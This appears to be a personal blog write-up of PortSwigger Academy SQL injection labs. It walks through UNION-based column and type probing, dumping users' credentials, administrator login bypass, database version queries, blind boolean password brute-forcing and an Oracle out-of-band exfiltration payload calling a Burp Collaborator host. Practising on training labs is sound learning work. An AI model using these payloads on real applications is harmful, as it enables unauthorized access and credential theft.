November 21, 2024
PortSwigger

SQL Injection Burp Academy

Robby Rob

Table of Contents

SQL Injection obtaining data from other tables

The goal of this lab is to retrieve data from other tables using the product category filter. It gives us a table name (users) and columns name (username and password).

Let’s begin!

(1) First step is determine number of columns returned by the query. I attempted this with ‘ORDER BY 1–

and ‘UNION SELECT NULL, NULL,–

we now know there are 2 columns next step is

(2) Determine data type of columns ‘UNION SELECT ‘a’, ‘b’, FROM users–

both columns are text. So we can then assume this is the username and password and take it from the users table

(3) ‘UNION SELECT ‘username’, ‘password’, FROM users–

this successfully returns a list of username and passwords- and we can use the admin’s credentials ->login->complete the lab.

SQL injection attack, querying the database type and version on MySQL and Microsoft

The end goal is to display the DB Version

Analysis: Vulnerable field is the category field (accessories)

(1). Find number of columns ‘ order by 1–

I got an error doing this so the next step was to use the # as a comment to test.

After doing this I was successful: ‘ order by 1# ‘order by 2# ‘order by 3# -> server error I then did

(2) Determine the type of data I entered in ‘UNION SELECT ‘a’, ‘b’# successfully and received ‘a’ and ‘b’ as feedback.

Lastly, I attempted to retrieve the DB version with the following: ‘ UNION SELECT @@version, NULL#

This successfully retrieved the db version

SQL injection attack, listing the database contents on Oracle

The first step in this lab is to find the number of columns available by: 1.) ‘ORDER BY 1– ‘ORDER BY 2–

From here we determine that there are two columns.

Next is to determine the data types the columns can hold: 2.) ‘Union SELECT NULL, NULL from DUAL test with ‘a’, ‘b’

Both hold text ‘a’,’b’+FROM+dual

3.) Get table name GET /filter?category=Pets’UNION+SELECT+’a’,table_name+FROM+all_tables–

Returns an interesting table name: USERS_KCRMQH

4.) Get column name ‘UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name = USERS_KCRMQH and then do ‘UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_name=’USERS_KCRMQH’–

PASSWORD_DZSYWL USERNAME_JTQIDO

5.) Pull from the table ‘UNION SELECT USERNAME_JTQIDO, PASSWORD_DZSYWL FROM USERS_KCRMQH–

Returns: administrator xtd0su7c9ufzsvu4pyme

SQL Injection vulnerability allowing login bypass

Goal: To solve the lab, perform an SQL injection attack that logs in to the application as the administrator user.

(1) Determine that the application is vulnerable to sql. You can do this by injecting a ‘ in the login fields.

As a response, you will very likely get a DB error indicating that it is vulnerable to sql injection.

According to the Lab description, we need to bypass login for the user “administrator”

All we would have to do to solve this is modify the username parameter, giving it the value: administrator'--

The — mark will avoid all other following characters in the SQL Query and login to the administrator account successfully

Sql Injection Union Attack

Make the database retrieve the string: ‘EUOXzb’

  1. The first step in this lab is to find out the number of columns you can do this one of two ways: a. when solving for union based sql injection find number of rows by: ‘ ORDER BY 1– b. ‘ UNION SELECT NULL, NULL– By doing this I found that there is a total of 3 rows. ![[Pasted image 20211201102036.png]]

Now I realized that I have to find a column with a useful data type in a sql injection. So to do this I have submitted string data on union select payloads that place a string value into each column. If the data type isn’t compatible the db should return an error or exception

‘ UNION SELECT ‘a’,NULL,NULL,NULL–
‘ UNION SELECT NULL,’a’,NULL,NULL–
‘ UNION SELECT NULL,NULL,’a’,NULL–
‘ UNION SELECT NULL,NULL,NULL,’a’–

I used this query to determine that the expected input is a string: ‘ UNION SELECT NULL,’a’,NULL–

I then searched for the required string using: ‘ UNION SELECT NULL,’VqGnBB’,NULL–

and received a successful result.

SQL Injection Attack- Querying the DB type and version

Get the DB Type and Version.

Provided cheatsheet below should assist:

Oracle SELECT banner FROM v$version SELECT version FROM v$instance Microsoft SELECT @@version PostgreSQL SELECT version() MySQL SELECT @@version

with a union based sql injection first step is to (1) determine number of columns- from the lab prompt we can assume two but for demonstration purposes I entered:

‘ORDER BY 2–

Full: /filter?category=Pets’ ORDER BY 2–

(2) Find out what data it accepts. You can do this with ‘ UNION SELECT NULL, ‘a’–

I received an error here because the DB is Oracle and every SELECT query must use the FROM keyword. Most Oracle DB will allow you to use the table dual.

After finding out which fields accept text (3) Next step is to try out a few queries. I did the following: category=Pets’ UNION SELECT ‘a’,NULL FROM dual– this let me know I could put BANNER in for ‘a’

I then did: ‘UNION SELECT BANNER, NULL FROM v$version–

and the query successfully returned the DB version

Retrieving multiple values within a single column

Suppose that a query only returns one single column- the goal of this lab is to find which columns accept string data

‘ UNION SELECT username || ‘~’ || password FROM users–

‘ UNION SELECT ‘username’ | | ‘password’ FROM users–

‘ UNION SELECT NULL,’a’,NULL– returns error but ‘ UNION SELECT NULL,’a’– returns success

so from the successful query I was able to determine that the second column does indeed expect text.

Taking from the example- we know that the second column accepts text so all we have left to do is concatenate accordingly:

category=Gifts’ UNION SELECT NULL, username || ‘~’ || password FROM users– ![[Pasted image 20211206152538.png]]

This gives us the username and password separated by a ~

this is a double pipe sequence which is string concatenation operator on oracle. The injected query concatenates together the values of the username and pw fields separated by the ~ char.

Then we can login as the administrator accordingly.

Determining the number of columns returned by query

In this lab, the goal is to return the number of columns with a query.

The category parameter is deemed to be vulnerable to UNION based sql injection- so I selected a category intercepted the request with Burpsuite Pro.

I modified the category parameter according to the list provided by PortSwigger’s notes. This will assist by returning a 200 OK when the correct number of columns is returned.

?category=Gifts'+UNION+SELECT+null--            500 Internal Server Error
?category=Gifts'+UNION+SELECT+null,null--       500 Internal Server Error
?category=Gifts'+UNION+SELECT+null,null,null--  200 OK

As we can see the: category=Gifts’+UNION+SELECT+null,null,null– 200 OK Is the correct query chosen.

Blind SQL Injection with Conditional Responses

Lab 11 Vulnerable Parameter – Tracking Cookies

confirm the parameter is vulnerable to blind SQL Injection:

‘ AND ‘1’=’1

receives a welcome back message!

select tracking id from tracking table where tracking id equals = #trackingid

(2) confirm that we have a users table select tracking=id from tracking-table where trackingid=’dfasdfagew’ and (select ‘x’ from users LIMIT 1)=’x’–‘

x is an arbitrary value- what this query does: if there is a users table output x for each entry in the users table. If the users table has 5 users we should get 5 rows that have x in them. Destroys the query so limit it to one entry. Output the value x for each entry in the user’s table.

outputs x for the first entry in the users table if it exists.

3.) check to see if administrator is valid

AND (SELECT username FROM users WHERE username=’administrator’)=’administrator

4.) Enumerate the password of the administrator user

find the length using the following query: ‘AND (SELECT ‘x’ FROM users WHERE username=’administrator’ AND LENGTH(password) > 1)=’x

after bruteforcing in intruder- I simply brutefofrced the length and found that it was greater than 19 but less than 21 so its 20 ‘AND+(SELECT+’x’+FROM+users+WHERE+username%3d’administrator’+AND+LENGTH(password)+>+19)%3d’x;

5.) find each character in intruder

AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username=’administrator’)=’§a§

Blind SQL Injection Out of Band Exfiltration

Vulnerable parameter is the tracking cookie DB has users columns username and password

Login as the administrator user

‘ || (SELECT extractvalue(xmltype(‘ %remote;]>’),’/l’) FROM dual)–

ulj5yhd5se03xj88tv5vzluyvp1fp4.burpcollaborator.net

Rob

View all posts by Rob →

You might also like

SSRF

XXE Injection

PortSwigger Authentication

Leave a Reply

Your email address will not be published. Required fields are marked *